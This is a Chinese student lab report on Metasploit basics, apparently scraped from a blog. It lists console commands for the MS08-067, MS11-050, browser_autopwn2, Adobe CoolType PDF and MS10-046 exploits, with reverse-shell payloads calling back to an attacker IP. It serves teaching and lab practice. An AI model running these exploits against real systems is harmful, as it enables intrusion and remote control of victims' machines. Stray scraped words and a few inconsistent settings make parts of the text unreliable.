Exp5:MSF基礎應用

Exp5:MSF基礎應用

1、基礎問題回答

(1)用本身的話解釋什麼是 exploit , payload , encode.html

exploit: 設至關於利用漏洞偷偷打開的管道,將作好的木馬病毒等順利傳輸到靶機。

payload: 簡單來講就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,而後經過管道傳輸進去後開始爲咱們控制靶機服務。

encode: 針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特徵,可是不改變payload爲咱們所用的特徵,但能對payload進行加工。
shell

2、實踐過程

  • 1.Windows服務滲透攻擊——MS08-067安全漏洞
    • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:windows

      msf > use exploit/windows/smb/ms08_067_netapi

      msf exploit(ms08_067_netapi) > show payloads

      msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連

      msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻擊機ip

      msf exploit(ms08_067_netapi) > set LPORT 5213 //攻擊端口

      msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶機ip,特定漏洞端口已經固定

      msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高

      msf exploit(ms08_067_netapi) > exploit //攻擊

    • 此時須要關閉靶機的防火牆,否則會出現ConnectionTimeOut的失敗;
      api

    • 攻擊成功後的結果:
      瀏覽器

  • 2.瀏覽器滲透攻擊——MS11-050安全

    • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload
    windows/meterpreter/reverse_http //http反向回連

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻擊機ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻擊端口固定

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //統一資源標識符路徑設置

    msf exploit(ms11_050_cobjectelement) > exploit

  • 測試沒法成功,老是會出現IE瀏覽器的錯誤,我以爲問題是出在瀏覽器版本不對,不適合那個漏洞,既然如此,那就換個漏洞唄,下面使用一種自動根據瀏覽器版本選擇合適的漏洞進行攻擊的方法
    • ** 實施browser_autopwn模塊 **
      • 如今攻擊機裏進入msfconsole,而後分別輸入

        use auxiliary/server/browser_autopwn2

        set SRVHOST 192.168.43.161

        set URIPATH auto

        show options

        服務器

      • 開始攻擊,此時能夠看到msf在不停的嘗試不一樣的payload
      • 嘗試成功,輸出了可被訪問的URL http://192.168.43.161:8080/auto並啓動服務器;
        session

      • 在靶機瀏覽器上輸入URL後,瀏覽器跳轉到 http://192.168.43.161:8080/auto/FaOGsp
        tcp

      • 回頭看一下kali機,發現回連成功了,輸入session -i 2獲取對話,此時,已經得到了靶機的控制權。
        測試

  • 3.針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton

    • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回連

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻擊機ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻擊端口

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //設置生成pdf文件的名字

    msf exploit(adobe_cooltype_sing) > exploit //攻擊
    • 將生成的pdf文件拷貝到靶機上。

    • 在kali上輸入back退出當前模塊,進入監聽模塊,輸入如下命令:

    msf > use exploit/multi/handler //進入監聽模塊

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向鏈接

    msf exploit(handler) > set LHOST 192.168.43.161 //攻擊機ip

    msf exploit(handler) > set LPORT 5213 //攻擊端口固定

    msf exploit(handler) > exploit

    • 在靶機上打開5213lzm.pdf文件:
    • 攻擊機顯示攻擊成功:
  • 4.快捷方式圖標漏洞——MS10-046
    • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:

      msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

      msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻擊機ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回連

      msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻擊機ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻擊

      • 此時彈出一個攻擊者IP的目錄,其中有一個「快捷方式」的圖標:
      • 對於已創建好了會話,經過命令sessions查看,並選擇sessions -i 1,得到靶機控制權。

        (PS)本次試驗時間上跨度有點大,沒能連貫的作完,第四個項任務是在ciscn結束以後作的,而此時的kali機已被折騰崩了,因此考了別人的虛擬機,繼續作完了,這裏的IP不是以前那個。

3、實踐總結及體會

本次試驗給我最深的感觸就是msf的強大,活用msf真的可以在滲透測試或者以攻擊爲目的的行爲給予很大幫助,同時,爲了防止被攻擊,仍是及時更新系統,填補漏洞,由於有一雙研眼鏡正在窺探你的筆記本。

相關文章
相關標籤/搜索